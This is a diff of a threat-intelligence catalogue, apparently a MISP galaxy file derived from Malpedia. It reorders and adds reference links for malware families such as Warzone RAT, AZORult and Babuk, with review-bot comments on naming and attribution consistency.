"https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", + "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/", + "https://www.bleepingcomputer.com/news/security/avaddon-ransomware-shuts-down-and-releases-decryption-keys/", + 
"https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf", + "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html", + "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://twitter.com/Securityinbits/status/1271065316903120902", + "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", + "https://medium.com/s2wlab/w4-jan-en-story-of-the-week-ransomware-on-the-darkweb-7595544363b1", + "https://www.welivesecurity.com/la-es/2021/05/31/ransomware-avaddon-principales-caracteristicas/", + "https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/", + "https://www.swascan.com/it/avaddon-ransomware/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://www.hornetsecurity.com/en/security-information/avaddon-from-seeking-affiliates-to-in-the-wild-in-2-days/" ], "synonyms": [], "type": [] @@ -13851,8 +14486,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.avcrypt", - "https://twitter.com/malwrhunterteam/status/976925447043846145", - "https://www.bleepingcomputer.com/news/security/the-avcrypt-ransomware-tries-to-uninstall-your-av-software/" + "https://www.bleepingcomputer.com/news/security/the-avcrypt-ransomware-tries-to-uninstall-your-av-software/", + "https://twitter.com/malwrhunterteam/status/976925447043846145" ], "synonyms": [], "type": [] 
@@ -13892,50 +14527,55 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ave_maria", - "https://www.youtube.com/watch?v=81fdvmGmRvM", - "https://securityintelligence.com/posts/roboski-global-recovery-automation/", - "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf", - "https://www.kaspersky.com/about/press-releases/2019_fin7-hacking-group-targets-more-than-130-companies-after-leaders-arrest", - "https://cocomelonc.github.io/tutorial/2022/05/02/malware-pers-3.html", - "https://medium.com/insomniacs/do-you-want-to-bake-a-donut-come-on-lets-go-update-go-away-maria-e8e2b33683b1", - "https://www.youtube.com/watch?v=T0tdj1WDioM", - "https://www.trendmicro.com/en_us/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-ameri.html", - "https://securelist.com/fin7-5-the-infamous-cybercrime-rig-fin7-continues-its-activities/90703/", - "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html", - "https://www.uptycs.com/blog/confucius-apt-deploys-warzone-rat", - "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", - "https://www.youtube.com/watch?v=-G82xh9m4hc", - "https://www.uptycs.com/blog/warzonerat-can-now-evade-with-process-hollowing", - "https://www.fortinet.com/blog/threat-research/phishing-campaign-delivering-fileless-malware", - "https://blogs.blackberry.com/en/2021/12/threat-thursday-warzone-rat-breeds-a-litter-of-scriptkiddies", - "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-american-entities-with-commodity-rats/BlindEagleIOCList.txt", - "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/", - "https://mp.weixin.qq.com/s/C09P0al1nhsyyujHRp0FAw", - "https://www.huntress.com/blog/ave-maria-and-the-chambers-of-warzone-rat", - "https://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/", - 
"https://reaqta.com/2019/04/ave_maria-malware-part1/", - "https://blog.morphisec.com/syk-crypter-discord", - "https://blog.yoroi.company/research/the-ave_maria-malware/", - "https://www.netskope.com/blog/dbatloader-abusing-discord-to-deliver-warzone-rat", - "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord", - "https://kienmanowar.wordpress.com/2023/03/25/quicknote-decrypting-the-c2-configuration-of-warzone-rat/", - "https://www.uptycs.com/blog/warzone-rat-comes-with-uac-bypass-technique", + "https://exploitreversing.files.wordpress.com/2022/11/mas_6-1.pdf", + "https://github.com/muha2xmad/Python/blob/bdc7a711d5a775f8ae47b591f20fdd2e1360b77b/warzonerat/warzonerat_config_extraction.ipynb", "https://mp.weixin.qq.com/s/fsesosMnKIfAi_I9I0wKSA", - "https://research.checkpoint.com/2020/warzone-behind-the-enemy-lines/", - "https://resources.malwarebytes.com/files/2020/05/CTNT_Q1_2020_COVID-Report_Final.pdf", "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", - "http://blog.morphisec.com/threat-alert-ave-maria-infostealer-on-the-rise-with-new-stealthier-delivery", + "https://www.kaspersky.com/about/press-releases/2019_fin7-hacking-group-targets-more-than-130-companies-after-leaders-arrest", + "https://medium.com/insomniacs/do-you-want-to-bake-a-donut-come-on-lets-go-update-go-away-maria-e8e2b33683b1", + "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", "https://go.recordedfuture.com/hubfs/reports/cta-2022-0919.pdf", + "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord", + "https://muha2xmad.github.io/malware-analysis/warzonerat/", "https://blog.talosintelligence.com/2021/09/operation-armor-piercer.html", - "https://blog.talosintelligence.com/2020/09/salfram-robbing-place-without-removing.html", - "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf", - 
"https://blogs.quickheal.com/warzone-rat-beware-of-the-trojan-malware-stealing-data-triggering-from-various-office-documents/", - "https://www.trendmicro.com/en_us/research/21/i/Water-Basilisk-Uses-New-HCrypt-Variant-to-Flood-Victims-with-RAT-Payloads.html", + "https://mp.weixin.qq.com/s/C09P0al1nhsyyujHRp0FAw", + "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf", + "https://research.checkpoint.com/2020/warzone-behind-the-enemy-lines/", + "https://www.fortinet.com/blog/threat-research/phishing-campaign-delivering-fileless-malware", "https://asec.ahnlab.com/en/36629/", - "https://ti.qianxin.com/blog/articles/Kasablanka-Group-Probably-Conducted-Compaigns-Targeting-Russia/", - "https://securelist.com/apt-trends-report-q3-2020/99204/", + "https://blog.yoroi.company/research/the-ave_maria-malware/", + "https://blog.talosintelligence.com/2020/09/salfram-robbing-place-without-removing.html", + "https://www.netskope.com/blog/dbatloader-abusing-discord-to-deliver-warzone-rat", + "https://www.uptycs.com/blog/warzone-rat-comes-with-uac-bypass-technique", + "https://www.uptycs.com/blog/warzonerat-can-now-evade-with-process-hollowing", "https://blog.team-cymru.com/2019/07/25/unmasking-ave_maria/", - "https://exploitreversing.files.wordpress.com/2022/11/mas_6-1.pdf" + "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html", + "https://www.youtube.com/watch?v=-G82xh9m4hc", + "https://securityintelligence.com/posts/roboski-global-recovery-automation/", + "https://gi7w0rm.medium.com/uncovering-ddgroup-a-long-time-threat-actor-d3b3020625a4", + "https://www.youtube.com/watch?v=81fdvmGmRvM", + "https://blogs.blackberry.com/en/2021/12/threat-thursday-warzone-rat-breeds-a-litter-of-scriptkiddies", + "https://blogs.quickheal.com/warzone-rat-beware-of-the-trojan-malware-stealing-data-triggering-from-various-office-documents/", + "https://securelist.com/fin7-5-the-infamous-cybercrime-rig-fin7-continues-its-activities/90703/", + 
"https://blog.morphisec.com/syk-crypter-discord", + "https://securelist.com/apt-trends-report-q3-2020/99204/", + "http://blog.morphisec.com/threat-alert-ave-maria-infostealer-on-the-rise-with-new-stealthier-delivery", + "https://www.trendmicro.com/en_us/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-ameri.html", + "https://www.securonix.com/securonix-threat-labs-security-advisory-multistorm-leverages-python-based-loader-as-onedrive-utilities-to-drop-rat-payloads/", + "https://reaqta.com/2019/04/ave_maria-malware-part1/", + "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q2%20Botnet%20Threat%20Update.pdf", + "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/", + "https://kienmanowar.wordpress.com/2023/03/25/quicknote-decrypting-the-c2-configuration-of-warzone-rat/", + "https://ti.qianxin.com/blog/articles/Kasablanka-Group-Probably-Conducted-Compaigns-Targeting-Russia/", + "https://www.uptycs.com/blog/confucius-apt-deploys-warzone-rat", + "https://resources.malwarebytes.com/files/2020/05/CTNT_Q1_2020_COVID-Report_Final.pdf", + "https://cocomelonc.github.io/tutorial/2022/05/02/malware-pers-3.html", + "https://www.trendmicro.com/en_us/research/21/i/Water-Basilisk-Uses-New-HCrypt-Variant-to-Flood-Victims-with-RAT-Payloads.html", + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-american-entities-with-commodity-rats/BlindEagleIOCList.txt", + "https://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/", + "https://www.huntress.com/blog/ave-maria-and-the-chambers-of-warzone-rat", + "https://www.youtube.com/watch?v=T0tdj1WDioM", + "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf" ], "synonyms": [ "AVE_MARIA", 
@@ -13954,21 +14594,21 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.avos_locker", - "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-avoslocker", - "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/", - "https://blog.talosintelligence.com/2022/06/avoslocker-new-arsenal.html", "https://news.sophos.com/en-us/2021/12/22/avos-locker-remotely-accesses-boxes-even-running-in-safe-mode/", - "https://www.advintel.io/post/enter-karakurt-data-extortion-arm-of-prolific-ransomware-group", - "https://unit42.paloaltonetworks.com/emerging-ransomware-groups/", "https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf", - "https://blog.malwarebytes.com/threat-analysis/2021/07/avoslocker-enters-the-ransomware-scene-asks-for-partners/", + "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/", "https://cdn.pathfactory.com/assets/10555/contents/400686/13f4424c-05b4-46db-bb9c-6bf9b5436ec4.pdf", - "https://www.ic3.gov/Media/News/2022/220318.pdf", - "https://www.trendmicro.com/en_us/research/22/e/avoslocker-ransomware-variant-abuses-driver-file-to-disable-anti-Virus-scans-log4shell.html", - "https://blog.cyble.com/2022/01/17/avoslocker-ransomware-linux-version-targets-vmware-esxi-servers/", "https://www.advintel.io/post/discontinued-the-end-of-conti-s-brand-marks-new-chapter-for-cybercrime-landscape", + "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-avoslocker", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", + "https://unit42.paloaltonetworks.com/emerging-ransomware-groups/", + "https://blog.talosintelligence.com/2022/06/avoslocker-new-arsenal.html", + 
"https://www.trendmicro.com/en_us/research/22/e/avoslocker-ransomware-variant-abuses-driver-file-to-disable-anti-Virus-scans-log4shell.html", + "https://www.advintel.io/post/enter-karakurt-data-extortion-arm-of-prolific-ransomware-group", + "https://blog.malwarebytes.com/threat-analysis/2021/07/avoslocker-enters-the-ransomware-scene-asks-for-partners/", + "https://www.ic3.gov/Media/News/2022/220318.pdf", "https://blog.qualys.com/vulnerabilities-threat-research/2022/03/06/avoslocker-ransomware-behavior-examined-on-windows-linux", + "https://blog.cyble.com/2022/01/17/avoslocker-ransomware-linux-version-targets-vmware-esxi-servers/", "https://blogs.blackberry.com/en/2022/04/threat-thursday-avoslocker-prompts-advisory-from-fbi-and-fincen" ], "synonyms": [], @@ -13977,6 +14617,18 @@ "uuid": "8cee7a73-df5f-4ca3-ac52-b8a29a9b7414", "value": "AvosLocker" }, + { + "description": "Was previously wrongly tagged as PoweliksDropper, now looking for additional context.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.avrecon" + ], + "synonyms": [], + "type": [] + }, + "uuid": "969d1054-b917-4fb8-b3f8-1e33926fdb65", + "value": "Unidentified 061 (Windows)" + }, { "description": "", "meta": { @@ -14020,8 +14672,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.aytoke", - "https://www.youtube.com/watch?v=FttiysUZmDw", - "https://snort.org/rule_docs/1-34217" + "https://snort.org/rule_docs/1-34217", + "https://www.youtube.com/watch?v=FttiysUZmDw" ], "synonyms": [], "type": [] 
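Review bot: The new cluster entry pairs `"value": "Unidentified 061 (Windows)"` with a single reference whose slug is `win.avrecon`, and its description says the sample was previously tagged as PoweliksDropper, so three names are in play for one record while `"synonyms": []` is empty. Consumers match galaxy clusters on `value` and `synonyms`, so nothing derived from the `avrecon` slug will resolve to this entry; if the generator takes `value` from the upstream family name, it is worth confirming that the upstream name and slug still agree before the uuid `969d1054-…` is published, since a later rename would either change the uuid or leave a stale value. The description also reads as a maintainer note rather than a description of the family; a short `"description"` stating what is known, with the tagging history moved to the end, would serve consumers of this field better.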
@@ -14034,69 +14686,70 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.azorult", - "https://cocomelonc.github.io/tutorial/2021/09/04/simple-malware-av-evasion.html", - "https://isc.sans.edu/diary/25120", - "https://ke-la.com/whats-dead-may-never-die-azorult-infostealer-decommissioned-again/", - "https://ke-la.com/information-stealers-a-new-landscape/", - "https://malwarebreakdown.com/2017/11/12/seamless-campaign-delivers-ramnit-via-rig-ek-at-188-225-82-158-follow-up-malware-is-azorult-stealer/", - "http://www.vkremez.com/2017/07/lets-learn-reversing-credential-and.html", - "https://securityintelligence.com/posts/roboski-global-recovery-automation/", - "https://blog.team-cymru.com/2020/02/19/azorult-what-we-see-using-our-own-tools/", - "https://blog.talosintelligence.com/2020/04/azorult-brings-friends-to-party.html", - "https://community.riskiq.com/article/56e28880", - "https://blog.prevailion.com/2020/02/the-triune-threat-mastermana-returns.html", - "https://www.zscaler.com/blogs/research/multistage-freedom-loader-used-spread-azorult-and-nanocore-rat", - "https://asec.ahnlab.com/en/26517/", - "https://maxkersten.nl/binary-analysis-course/malware-analysis/azorult-loader-stages/", - "https://blog.minerva-labs.com/puffstealer-evasion-in-a-cloak-of-multiple-layers", - "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672", - "https://medium.com/s2wlab/w1-feb-en-story-of-the-week-stealers-on-the-darkweb-49945a31601d", - "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", - "https://www.bleepingcomputer.com/news/security/azorult-trojan-serving-aurora-ransomware-by-malactor-oktropys/", - "https://mariohenkel.medium.com/decrypting-azorult-traffic-for-fun-and-profit-9f28d8638b05", - "https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/", - 
"https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware", - "https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/", - "https://www.blueliv.com/blog-news/research/azorult-crydbrox-stops-sells-malware-credential-stealer/", - "https://www.virusbulletin.com/uploads/pdf/magazine/2021/202104-design-vulnerabilities-azorult-cc-panels.pdf", - "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/", - "https://www.vmray.com/cyber-security-blog/azorult-delivered-by-guloader-malware-analysis-spotlight/", - "https://blog.yoroi.company/research/aggah-how-to-run-a-botnet-without-renting-a-server-for-more-than-a-year/", - "https://blog.minerva-labs.com/azorult-now-as-a-signed-google-update", - "https://unit42.paloaltonetworks.com/cybersquatting/", - "https://yoroi.company/research/apt-or-not-apt-whats-behind-the-aggah-campaign/", - "https://fr3d.hk/blog/gazorp-thieving-from-thieves", + "https://outpost24.com/blog/using-qiling-framework-to-unpack-ta505-packed-samples/", "https://yoroi.company/research/aggah-how-to-run-a-botnet-without-renting-a-server-for-more-than-a-year/", - "https://blogs.blackberry.com/en/2020/04/threat-spotlight-gootkit-banking-trojan", - "https://threatvector.cylance.com/en_us/home/threat-spotlight-analyzing-azorult-infostealer-malware.html", - "https://blog.360totalsecurity.com/en/bayworld-event-cyber-attack-against-foreign-trade-industry/", - "https://www.domaintools.com/resources/blog/identifying-network-infrastructure-related-to-a-who-spoofing-campaign", - "https://blog.nviso.eu/2020/09/01/epic-manchego-atypical-maldoc-delivery-brings-flurry-of-infostealers/", - "https://blog.checkpoint.com/2022/05/10/a-german-car-attack-on-german-vehicle-businesses/", - "https://blog.talosintelligence.com/2021/12/magnat-campaigns-use-malvertising-to.html", - "https://go.recordedfuture.com/hubfs/reports/cta-2022-0802.pdf", - "https://community.riskiq.com/article/2a36a7d2/description", - 
"https://resources.malwarebytes.com/files/2020/05/CTNT_Q1_2020_COVID-Report_Final.pdf", - "https://www.cybereason.com/blog/the-hole-in-the-bucket-attackers-abuse-bitbucket-to-deliver-an-arsenal-of-malware", + "https://asec.ahnlab.com/en/26517/", + "https://blog.talosintelligence.com/2020/06/tor2mine-is-up-to-their-old-tricks-and_11.html", + "https://blog.team-cymru.com/2020/02/19/azorult-what-we-see-using-our-own-tools/", + "https://twitter.com/DrStache_/status/1227662001247268864", "https://www.splunk.com/en_us/blog/security/-applocker-rules-as-defense-evasion-complete-analysis.html", - "https://ke-la.com/exploring-the-genesis-supply-chain-for-fun-and-profit/", - "https://research.checkpoint.com/2019/select-code_execution-from-using-sqlite/", - "https://www.trendmicro.com/en_us/research/21/k/campaign-abusing-rats-uses-fake-websites.html", - "https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors", - "https://malwarebreakdown.com/2017/07/24/the-seamless-campaign-drops-ramnit-follow-up-malware-azorult-stealer-smoke-loader-etc/", - "https://research.checkpoint.com/the-emergence-of-the-new-azorult-3-3/", - "https://securelist.com/azorult-analysis-history/89922/", + "https://ke-la.com/information-stealers-a-new-landscape/", + "https://www.domaintools.com/resources/blog/identifying-network-infrastructure-related-to-a-who-spoofing-campaign", + "https://isc.sans.edu/diary/25120", + "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", + "https://www.youtube.com/watch?v=EyDiIAt__dI", + "https://blog.minerva-labs.com/puffstealer-evasion-in-a-cloak-of-multiple-layers", + "https://ke-la.com/whats-dead-may-never-die-azorult-infostealer-decommissioned-again/", + "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145", + 
"https://malwarebreakdown.com/2017/11/12/seamless-campaign-delivers-ramnit-via-rig-ek-at-188-225-82-158-follow-up-malware-is-azorult-stealer/", "https://medium.com/s2wlab/operation-synctrek-e5013df8d167", + "https://ke-la.com/exploring-the-genesis-supply-chain-for-fun-and-profit/", + "https://mariohenkel.medium.com/decrypting-azorult-traffic-for-fun-and-profit-9f28d8638b05", + "https://blog.checkpoint.com/2022/05/10/a-german-car-attack-on-german-vehicle-businesses/", + "https://medium.com/s2wlab/w1-feb-en-story-of-the-week-stealers-on-the-darkweb-49945a31601d", + "https://www.trendmicro.com/en_us/research/21/k/campaign-abusing-rats-uses-fake-websites.html", + "https://www.vmray.com/cyber-security-blog/azorult-delivered-by-guloader-malware-analysis-spotlight/", + "https://research.checkpoint.com/the-emergence-of-the-new-azorult-3-3/", + "https://www.zscaler.com/blogs/research/multistage-freedom-loader-used-spread-azorult-and-nanocore-rat", + "https://yoroi.company/research/apt-or-not-apt-whats-behind-the-aggah-campaign/", + "http://www.vkremez.com/2017/07/lets-learn-reversing-credential-and.html", + "https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors", + "https://community.riskiq.com/article/56e28880", + "https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/", + "https://www.blueliv.com/blog-news/research/azorult-crydbrox-stops-sells-malware-credential-stealer/", + "https://securityintelligence.com/posts/roboski-global-recovery-automation/", + "https://www.cybereason.com/blog/the-hole-in-the-bucket-attackers-abuse-bitbucket-to-deliver-an-arsenal-of-malware", + "https://cocomelonc.github.io/tutorial/2021/09/04/simple-malware-av-evasion.html", + "https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware", + 
"https://research.checkpoint.com/2019/select-code_execution-from-using-sqlite/", + "https://blog.minerva-labs.com/azorult-now-as-a-signed-google-update", + "https://go.recordedfuture.com/hubfs/reports/cta-2022-0802.pdf", + "https://maxkersten.nl/binary-analysis-course/malware-analysis/azorult-loader-stages/", + "https://threatvector.cylance.com/en_us/home/threat-spotlight-analyzing-azorult-infostealer-malware.html", + "https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/", "https://www.proofpoint.com/us/threat-insight/post/new-version-azorult-stealer-improves-loading-features-spreads-alongside", "https://www.proofpoint.com/us/threat-insight/post/threat-actors-using-legitimate-paypal-accounts-to-distribute-chthonic-banking-trojan", + "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672", + "https://malwarebreakdown.com/2017/07/24/the-seamless-campaign-drops-ramnit-follow-up-malware-azorult-stealer-smoke-loader-etc/", + "https://community.riskiq.com/article/2a36a7d2/description", + "https://securelist.com/azorult-analysis-history/89922/", "https://isc.sans.edu/forums/diary/Analysis+of+a+tripleencrypted+AZORult+downloader/25768/", - "https://twitter.com/DrStache_/status/1227662001247268864", - "https://blog.talosintelligence.com/2020/06/tor2mine-is-up-to-their-old-tricks-and_11.html", - "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145", - "https://www.zscaler.com/blogs/security-research/targeted-attacks-oil-and-gas-supply-chain-industries-middle-east", - "https://www.youtube.com/watch?v=EyDiIAt__dI", + "https://blog.360totalsecurity.com/en/bayworld-event-cyber-attack-against-foreign-trade-industry/", + "https://unit42.paloaltonetworks.com/cybersquatting/", + "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/", "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/using-qiling-framework-to-unpack-ta505-packed-samples/", - 
"https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/" + "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/", + "https://blogs.blackberry.com/en/2020/04/threat-spotlight-gootkit-banking-trojan", + "https://www.bleepingcomputer.com/news/security/azorult-trojan-serving-aurora-ransomware-by-malactor-oktropys/", + "https://www.virusbulletin.com/uploads/pdf/magazine/2021/202104-design-vulnerabilities-azorult-cc-panels.pdf", + "https://resources.malwarebytes.com/files/2020/05/CTNT_Q1_2020_COVID-Report_Final.pdf", + "https://blog.nviso.eu/2020/09/01/epic-manchego-atypical-maldoc-delivery-brings-flurry-of-infostealers/", + "https://blog.prevailion.com/2020/02/the-triune-threat-mastermana-returns.html", + "https://blog.talosintelligence.com/2020/04/azorult-brings-friends-to-party.html", + "https://blog.yoroi.company/research/aggah-how-to-run-a-botnet-without-renting-a-server-for-more-than-a-year/", + "https://blog.talosintelligence.com/2021/12/magnat-campaigns-use-malvertising-to.html", + "https://www.zscaler.com/blogs/security-research/targeted-attacks-oil-and-gas-supply-chain-industries-middle-east", + "https://fr3d.hk/blog/gazorp-thieving-from-thieves" ], "synonyms": [ "PuffStealer", @@ -14112,8 +14765,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.azov_wiper", - "https://research.checkpoint.com/2022/pulling-the-curtains-on-azov-ransomware-not-a-skidsware-but-polymorphic-wiper/", "https://twitter.com/_CPResearch_/status/1587837524604465153", + "https://research.checkpoint.com/2022/pulling-the-curtains-on-azov-ransomware-not-a-skidsware-but-polymorphic-wiper/", "https://www.fortinet.com/blog/threat-research/the-year-of-the-wiper" ], "synonyms": [], 
@@ -14123,7 +14776,7 @@ "value": "Azov Wiper" }, { - "description": "", + "description": "According to PCrisk, Babadeda is a new sample in the crypters family, allowing threat actors to encrypt and obfuscate the malicious samples. The obfuscation allows malware to bypass the majority of antivirus protections without triggering any alerts. According to the researchers\u2019 analysis, Babadeda leverages a sophisticated and complex obfuscation that shows a very low detection rate by anti-virus engines.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.babadeda", @@ -14140,11 +14793,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.babar", - "https://www.gdatasoftware.com/blog/2015/02/24270-babar-espionage-software-finally-found-and-put-under-the-microscope", - "https://web.archive.org/web/20150218192803/http://www.cyphort.com/babar-suspected-nation-state-spyware-spotlight/", + "https://researchcenter.paloaltonetworks.com/2017/09/unit42-analysing-10-year-old-snowball/", "https://drive.google.com/a/cyphort.com/file/d/0B9Mrr-en8FX4dzJqLWhDblhseTA/", "http://www.spiegel.de/media/media-35683.pdf", - "https://researchcenter.paloaltonetworks.com/2017/09/unit42-analysing-10-year-old-snowball/" + "https://www.gdatasoftware.com/blog/2015/02/24270-babar-espionage-software-finally-found-and-put-under-the-microscope", + "https://web.archive.org/web/20150218192803/http://www.cyphort.com/babar-suspected-nation-state-spyware-spotlight/" ], "synonyms": [ "SNOWBALL" 
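Review bot: The new Babadeda `description` opens with "According to PCrisk" and restates that source's findings, but the only reference visible in the hunk is the Malpedia page; the rest of the `refs` list lies outside the hunk, so it cannot be confirmed here whether the PCrisk write-up is cited. If it is not, the attribution should be backed by the corresponding URL in `refs`, and if it is, the sentence can drop the attribution and let the reference carry it, matching the other descriptions in this file.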
@@ -14159,55 +14812,58 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.babuk",
- "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
- "https://medium.com/s2wlab/grooves-thoughts-on-blackmatter-babuk-and-interruption-in-the-supply-of-cheese-in-the-b5328bc764f2",
- "https://blog.cyble.com/2022/05/06/rebranded-babuk-ransomware-in-action-darkangels-ransomware-performs-targeted-attack/",
- "https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf",
- "https://sekurak.pl/udalo-nam-sie-zrealizowac-wywiad-z-grupa-ransomware-babuk-ktora-zaszyfrowala-policje-metropolitarna-w-waszyngtonie/",
- "https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html",
- "https://blog.talosintelligence.com/2021/11/babuk-exploits-exchange.html",
- "https://www.databreaches.net/babuk-re-organizes-as-payload-bin-offers-its-first-leak/",
- "https://medium.com/s2wlab/groove-x-ramp-the-relation-between-groove-babuk-ramp-and-blackmatter-f75644f8f92d",
- "https://lab52.io/blog/quick-review-of-babuk-ransomware-builder/",
- "https://www.bleepingcomputer.com/news/security/babuk-ransomware-is-back-uses-new-version-on-corporate-networks/",
- "https://www.bleepingcomputer.com/news/security/microsoft-exchange-servers-hacked-to-deploy-hive-ransomware/",
- "https://www.trendmicro.com/en_us/research/21/b/new-in-ransomware.html",
- "https://twitter.com/Sebdraven/status/1346377590525845504",
- "https://therecord.media/builder-for-babuk-locker-ransomware-leaked-online/",
- "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/",
- "https://www.zerofox.com/blog/babuk-ransomware-variant-delta-plus/",
- "https://medium.com/s2wlab/w4-jan-en-story-of-the-week-ransomware-on-the-darkweb-7595544363b1",
"https://www.mcafee.com/blogs/other-blogs/mcafee-labs/are-virtual-machines-the-new-gold-for-cyber-criminals/",
- "https://medium.com/s2wlab/blackmatter-x-babuk-using-the-same-web-server-for-sharing-leaked-files-d01c20a74751",
- "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
- "https://www.bleepingcomputer.com/news/security/leaked-babuk-locker-ransomware-builder-used-in-new-attacks/",
- "https://killingthebear.jorgetesta.tech/actors/evil-corp",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus/IOCs-blog-Ransomware%20Actor%20Abuses%20Genshin%20Impact%20Anti-Cheat%20Driver%20to%20Kill%20Antivirus.txt",
- "https://twitter.com/GossiTheDog/status/1409117153182224386",
- "https://www.bleepingcomputer.com/news/security/data-leak-marketplaces-aim-to-take-over-the-extortion-economy/",
- "https://sebdraven.medium.com/babuk-is-distributed-packed-78e2f5dd2e62",
- "https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/",
- "https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/",
- "https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html",
- "https://ke-la.com/new-russian-speaking-forum-a-new-place-for-raas/",
- "https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/how-groove-gang-is-shaking-up-the-ransomware-as-a-service-market-to-empower-affiliates/",
- "https://blog.morphisec.com/babuk-ransomware-variant-major-attack",
- "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-babuk-ransomware.pdf",
- "https://medium.com/s2wlab/w4-may-en-story-of-the-week-ransomware-on-the-darkweb-5f5b8d4c3b6f",
- "https://securelist.com/ransomware-world-in-2021/102169/",
